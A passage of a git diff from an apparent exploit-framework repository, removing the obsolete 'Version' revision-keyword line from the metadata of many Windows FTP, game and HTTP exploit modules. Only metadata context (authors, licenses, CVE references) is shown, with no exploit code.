b/modules/exploits/windows/ftp/proftp_banner.rb @@ -19,7 +19,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'His0k4 ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3976' ], diff --git a/modules/exploits/windows/ftp/sami_ftpd_user.rb b/modules/exploits/windows/ftp/sami_ftpd_user.rb index 05c18cb9d1..7e75fdaf0d 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_user.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_user.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'patrick' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Stance' => Msf::Exploit::Stance::Passive, 'References' => [ diff --git a/modules/exploits/windows/ftp/sasser_ftpd_port.rb b/modules/exploits/windows/ftp/sasser_ftpd_port.rb index ef4ece809e..7ad15463e1 100644 --- a/modules/exploits/windows/ftp/sasser_ftpd_port.rb +++ b/modules/exploits/windows/ftp/sasser_ftpd_port.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ '', '', 'patrick' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '6197'], diff --git a/modules/exploits/windows/ftp/scriptftp_list.rb b/modules/exploits/windows/ftp/scriptftp_list.rb index decdd018b5..b4ab754d4b 100644 --- a/modules/exploits/windows/ftp/scriptftp_list.rb +++ b/modules/exploits/windows/ftp/scriptftp_list.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote to gain the same rights as the user running ScriptFTP. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'modpr0be', #Vulnerability discovery and original exploit diff --git a/modules/exploits/windows/ftp/seagull_list_reply.rb b/modules/exploits/windows/ftp/seagull_list_reply.rb index ce652c02d9..4865b02b95 100644 --- a/modules/exploits/windows/ftp/seagull_list_reply.rb +++ b/modules/exploits/windows/ftp/seagull_list_reply.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote 'corelanc0d3r ' # found bug, wrote the exploit ], 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'References' => [ [ 'URL', 'http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/' ], diff --git a/modules/exploits/windows/ftp/servu_chmod.rb b/modules/exploits/windows/ftp/servu_chmod.rb index 03d4747002..8e62006150 100644 --- a/modules/exploits/windows/ftp/servu_chmod.rb +++ b/modules/exploits/windows/ftp/servu_chmod.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'theLightCosine', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-2111'], diff --git a/modules/exploits/windows/ftp/servu_mdtm.rb b/modules/exploits/windows/ftp/servu_mdtm.rb index 8d334865c7..3f2ae6ecf3 100644 --- a/modules/exploits/windows/ftp/servu_mdtm.rb +++ b/modules/exploits/windows/ftp/servu_mdtm.rb @@ -30,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'spoonm' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0330'], diff --git a/modules/exploits/windows/ftp/slimftpd_list_concat.rb b/modules/exploits/windows/ftp/slimftpd_list_concat.rb index b706ae695d..6d72f99cea 100644 --- a/modules/exploits/windows/ftp/slimftpd_list_concat.rb +++ b/modules/exploits/windows/ftp/slimftpd_list_concat.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Fairuzan Roslan ' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2373'], diff --git a/modules/exploits/windows/ftp/trellian_client_pasv.rb b/modules/exploits/windows/ftp/trellian_client_pasv.rb index d350604c4c..62dd407f7b 100644 --- a/modules/exploits/windows/ftp/trellian_client_pasv.rb +++ b/modules/exploits/windows/ftp/trellian_client_pasv.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote 'dookie' # MSF module author ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1465'], diff --git a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb index 671822d7d2..8746a5dbf6 100644 --- a/modules/exploits/windows/ftp/vermillion_ftpd_port.rb +++ b/modules/exploits/windows/ftp/vermillion_ftpd_port.rb @@ -48,7 +48,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'jduck' # metasploit module ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '62163' ], diff --git a/modules/exploits/windows/ftp/warftpd_165_pass.rb b/modules/exploits/windows/ftp/warftpd_165_pass.rb index 0c291c2f41..cb20c73e7a 100644 --- a/modules/exploits/windows/ftp/warftpd_165_pass.rb +++ b/modules/exploits/windows/ftp/warftpd_165_pass.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'hdm', 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '1999-0256'], diff --git a/modules/exploits/windows/ftp/warftpd_165_user.rb b/modules/exploits/windows/ftp/warftpd_165_user.rb index 1d33490ec1..7f71cf6a31 100644 --- a/modules/exploits/windows/ftp/warftpd_165_user.rb +++ b/modules/exploits/windows/ftp/warftpd_165_user.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'Fairuzan Roslan ', 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '1999-0256'], diff --git a/modules/exploits/windows/ftp/wftpd_size.rb b/modules/exploits/windows/ftp/wftpd_size.rb index 6bfee35758..5095327188 100644 --- a/modules/exploits/windows/ftp/wftpd_size.rb +++ b/modules/exploits/windows/ftp/wftpd_size.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-4318' ], diff --git a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb index 95e7f1aaf7..d91e271193 100644 --- a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb +++ b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'et', 'Reed Arvin ' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'References' => [ diff --git a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb index 5cc2d1a2d0..5bf5e94df4 100644 --- a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb +++ b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-4847' ], diff --git a/modules/exploits/windows/ftp/xftp_client_pwd.rb b/modules/exploits/windows/ftp/xftp_client_pwd.rb index 2f358ef4e8..f8d28343c8 100644 --- a/modules/exploits/windows/ftp/xftp_client_pwd.rb +++ b/modules/exploits/windows/ftp/xftp_client_pwd.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote 'dookie' # MSF module author ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '63968'], diff --git a/modules/exploits/windows/ftp/xlink_client.rb b/modules/exploits/windows/ftp/xlink_client.rb index a9acccff53..9cd158ecc9 100644 --- a/modules/exploits/windows/ftp/xlink_client.rb +++ b/modules/exploits/windows/ftp/xlink_client.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-5792' ], diff --git a/modules/exploits/windows/ftp/xlink_server.rb b/modules/exploits/windows/ftp/xlink_server.rb index 44b177376a..3383225c63 100644 --- a/modules/exploits/windows/ftp/xlink_server.rb +++ b/modules/exploits/windows/ftp/xlink_server.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-5792' ], diff --git a/modules/exploits/windows/games/mohaa_getinfo.rb b/modules/exploits/windows/games/mohaa_getinfo.rb index 507b60327d..9c26d26adc 100644 --- a/modules/exploits/windows/games/mohaa_getinfo.rb +++ b/modules/exploits/windows/games/mohaa_getinfo.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Jacopo Cervini' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0735'], diff --git a/modules/exploits/windows/games/racer_503beta5.rb b/modules/exploits/windows/games/racer_503beta5.rb index 8a6db2efd8..44f92dfc71 100644 --- a/modules/exploits/windows/games/racer_503beta5.rb +++ b/modules/exploits/windows/games/racer_503beta5.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Trancek ' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-4370' ], diff --git a/modules/exploits/windows/games/ut2004_secure.rb b/modules/exploits/windows/games/ut2004_secure.rb index b526b07d93..409d4c1054 100644 --- a/modules/exploits/windows/games/ut2004_secure.rb +++ b/modules/exploits/windows/games/ut2004_secure.rb @@ -35,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'stinko' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-0608'], diff --git a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb index 3ffb3808ba..579e195313 100644 --- a/modules/exploits/windows/http/adobe_robohelper_authbypass.rb +++ b/modules/exploits/windows/http/adobe_robohelper_authbypass.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => 'win', 'Privileged' => true, 'References' => diff --git a/modules/exploits/windows/http/altn_securitygateway.rb b/modules/exploits/windows/http/altn_securitygateway.rb index f1bf038a48..8b8af0cad6 100644 --- a/modules/exploits/windows/http/altn_securitygateway.rb +++ b/modules/exploits/windows/http/altn_securitygateway.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4193' ], diff --git a/modules/exploits/windows/http/altn_webadmin.rb b/modules/exploits/windows/http/altn_webadmin.rb index 1b01881a89..56ef23286f 100644 --- a/modules/exploits/windows/http/altn_webadmin.rb +++ b/modules/exploits/windows/http/altn_webadmin.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2003-0471' ], diff --git a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb index c8738f7731..9be7c32fe0 100644 --- a/modules/exploits/windows/http/amlibweb_webquerydll_app.rb +++ b/modules/exploits/windows/http/amlibweb_webquerydll_app.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'patrick' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '66814' ], diff --git a/modules/exploits/windows/http/apache_chunked.rb b/modules/exploits/windows/http/apache_chunked.rb index 5c541b1e06..efe5f2bd30 100644 --- a/modules/exploits/windows/http/apache_chunked.rb +++ b/modules/exploits/windows/http/apache_chunked.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote the server will crash. }, 'Author' => [ 'hdm', 'jduck' ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2002-0392' ], diff --git a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb index 747db6f52c..540ca2400b 100644 --- a/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb +++ b/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb @@ -28,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote only supports Windows based installations. }, 'Author' => 'patrick', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2006-3747' ], diff --git a/modules/exploits/windows/http/apache_modjk_overflow.rb b/modules/exploits/windows/http/apache_modjk_overflow.rb index 79a741f525..e315e6115d 100644 --- a/modules/exploits/windows/http/apache_modjk_overflow.rb +++ b/modules/exploits/windows/http/apache_modjk_overflow.rb @@ -21,7 +21,6 @@ class Metasploit3 < Msf::Exploit::Remote Should work on any Win32 OS. }, 'Author' => 'Nicob ', - 'Version' => '$Revision$', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/http/badblue_ext_overflow.rb b/modules/exploits/windows/http/badblue_ext_overflow.rb index 68fe364705..b2fbfbb9aa 100644 --- a/modules/exploits/windows/http/badblue_ext_overflow.rb +++ b/modules/exploits/windows/http/badblue_ext_overflow.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'acaro ', 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-0595' ], diff --git a/modules/exploits/windows/http/badblue_passthru.rb b/modules/exploits/windows/http/badblue_passthru.rb index 7f9da15538..5ecf4450c1 100644 --- a/modules/exploits/windows/http/badblue_passthru.rb +++ b/modules/exploits/windows/http/badblue_passthru.rb @@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2007-6377'], diff --git a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb index 126af5afc2..ffce9c30eb 100644 --- a/modules/exploits/windows/http/bea_weblogic_jsessionid.rb +++ b/modules/exploits/windows/http/bea_weblogic_jsessionid.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote long JSESSION cookie value can lead to arbirtary code execution. }, 'Author' => 'pusscat', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-5457' ], diff --git a/modules/exploits/windows/http/bea_weblogic_post_bof.rb b/modules/exploits/windows/http/bea_weblogic_post_bof.rb index 5c9eafb89f..fdf49d1a5a 100644 --- a/modules/exploits/windows/http/bea_weblogic_post_bof.rb +++ b/modules/exploits/windows/http/bea_weblogic_post_bof.rb @@ -34,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote 'KingCope', # Vulnerability Discovery and PoC 'juan vazquez', # Metasploit Module ], - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-3257' ], diff --git a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb index 308487741b..0f41db50d6 100644 --- a/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb +++ b/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote You may have to run this twice due to timing issues with handlers. }, 'Author' => 'pusscat', - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-4008' ], diff --git a/modules/exploits/windows/http/belkin_bulldog.rb b/modules/exploits/windows/http/belkin_bulldog.rb index b5b5185930..10213883a9 100644 --- a/modules/exploits/windows/http/belkin_bulldog.rb +++ b/modules/exploits/windows/http/belkin_bulldog.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '54395' ], diff --git a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb index d194673933..cd8ff1bd4b 100644 --- a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb +++ b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote 'rgod', # original public exploit ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2011-3011' ], diff --git a/modules/exploits/windows/http/ca_igateway_debug.rb b/modules/exploits/windows/http/ca_igateway_debug.rb index b588144822..8e87a97452 100644 --- a/modules/exploits/windows/http/ca_igateway_debug.rb +++ b/modules/exploits/windows/http/ca_igateway_debug.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'patrick', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-3190' ], diff --git a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb index d5208a4e0b..b907a58eb6 100644 --- a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb +++ b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-134' ], diff --git a/modules/exploits/windows/http/coldfusion_fckeditor.rb b/modules/exploits/windows/http/coldfusion_fckeditor.rb index b72125e7bc..d57ed0f221 100644 --- a/modules/exploits/windows/http/coldfusion_fckeditor.rb +++ b/modules/exploits/windows/http/coldfusion_fckeditor.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => 'win', 'Privileged' => true, 'References' => diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb index 1db1769ac4..3484cdf86f 100644 --- a/modules/exploits/windows/http/easyftp_list.rb +++ b/modules/exploits/windows/http/easyftp_list.rb @@ -34,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote 'ThE g0bL!N', # Original exploit [see References] 'jduck' # Metasploit re-implementation ], - 'Version' => '$Revision$', 'References' => [ [ 'OSVDB', '66614'], diff --git a/modules/exploits/windows/http/edirectory_host.rb b/modules/exploits/windows/http/edirectory_host.rb index 3e4b07e07b..6f14a12279 100644 --- a/modules/exploits/windows/http/edirectory_host.rb +++ b/modules/exploits/windows/http/edirectory_host.rb @@ -24,7 +24,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'MC', 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-5478'], diff --git a/modules/exploits/windows/http/edirectory_imonitor.rb b/modules/exploits/windows/http/edirectory_imonitor.rb index a695c62e7f..7d60d90283 100644 --- a/modules/exploits/windows/http/edirectory_imonitor.rb +++ b/modules/exploits/windows/http/edirectory_imonitor.rb @@ -27,7 +27,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'Unknown', 'Matt Olney ' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2005-2551'], diff --git a/modules/exploits/windows/http/efs_easychatserver_username.rb b/modules/exploits/windows/http/efs_easychatserver_username.rb index f9f5cb5bed..493d380937 100644 --- a/modules/exploits/windows/http/efs_easychatserver_username.rb +++ b/modules/exploits/windows/http/efs_easychatserver_username.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'LSO ' ], 'License' => BSD_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2004-2466' ], diff --git a/modules/exploits/windows/http/fdm_auth_header.rb b/modules/exploits/windows/http/fdm_auth_header.rb index 92d88dfaf8..d65c28ed17 100644 --- a/modules/exploits/windows/http/fdm_auth_header.rb +++ b/modules/exploits/windows/http/fdm_auth_header.rb @@ -29,7 +29,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-0183' ], diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb index cad27bbc43..0f62779c4e 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1555' ], diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb index 7cd782a3de..81dccf14d1 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1554' ], diff --git a/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb b/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb index 7504a428d2..f07b7a98bb 100644 --- a/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb +++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb @@ -25,7 +25,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1553' ], diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb index e32a92c5b8..f32b680475 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote ov.sprintf_new() is used, and gain arbitrary code execution.' }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => [ 'sinn3r', diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb index 6aa0686809..1ed8e2f1e3 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote overwrite data on the stack, and gain arbitrary code execution. }, 'License' => MSF_LICENSE, - 'Version' => "$Revision$", 'Author' => ['sinn3r'], 'References' => [ diff --git a/modules/exploits/windows/http/hp_nnm_openview5.rb b/modules/exploits/windows/http/hp_nnm_openview5.rb index c0e6cccc48..ef5984c7da 100644 --- a/modules/exploits/windows/http/hp_nnm_openview5.rb +++ b/modules/exploits/windows/http/hp_nnm_openview5.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2007-6204' ], diff --git a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb index 03d92c5942..747c49f8d9 100644 --- a/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb +++ b/modules/exploits/windows/http/hp_nnm_ovalarm_lang.rb @@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4179' ], diff --git a/modules/exploits/windows/http/hp_nnm_ovas.rb b/modules/exploits/windows/http/hp_nnm_ovas.rb index dc06758a90..aca3e27935 100644 --- a/modules/exploits/windows/http/hp_nnm_ovas.rb +++ b/modules/exploits/windows/http/hp_nnm_ovas.rb @@ -41,8 +41,6 @@ class Metasploit3 < Msf::Exploit::Remote # credit where credit is due. =) 'muts' ], - - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-1697' ], diff --git a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb index 84dfed7810..319dcd6a99 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebhelp.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-4178' ], diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb index 2159bdfbb7..8a335fd5c8 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_main.rb @@ -41,7 +41,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1964' ], diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb index 739fa456de..7f7fcca757 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_ovutil.rb @@ -44,7 +44,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1961' ], diff --git a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb index e3b6cf238e..eed839186f 100644 --- a/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb +++ b/modules/exploits/windows/http/hp_nnm_ovwebsnmpsrv_uro.rb @@ -40,7 +40,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1960' ], diff --git a/modules/exploits/windows/http/hp_nnm_snmp.rb b/modules/exploits/windows/http/hp_nnm_snmp.rb index ea9a1af4b8..763f1c9a55 100644 --- a/modules/exploits/windows/http/hp_nnm_snmp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmp.rb @@ -23,7 +23,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2009-3849' ], diff --git a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb index f30cc7dafe..3684b2119e 100644 --- a/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb +++ b/modules/exploits/windows/http/hp_nnm_snmpviewer_actapp.rb @@ -38,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote 'jduck' # Metasploit module ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2010-1552' ], diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_01.rb b/modules/exploits/windows/http/hp_nnm_toolbar_01.rb index 594f917dd8..c8119d6bc6 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_01.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_01.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'References' => [ [ 'CVE', '2008-0067' ], diff --git a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb index c59b6bf76f..291048a948 100644 --- a/modules/exploits/windows/http/hp_nnm_toolbar_02.rb +++ b/modules/exploits/windows/http/hp_nnm_toolbar_02.rb @@ -22,7 +22,6 @@ class Metasploit3 < Msf::Exploit::Remote against a specific build (ie. NNM 7.53_01195) }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Author' => [ 'Oren Isacson', # original discovery diff --git a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb index 7a83bc14a5..a068d83c3f 100644 --- a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb +++ b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb @@ 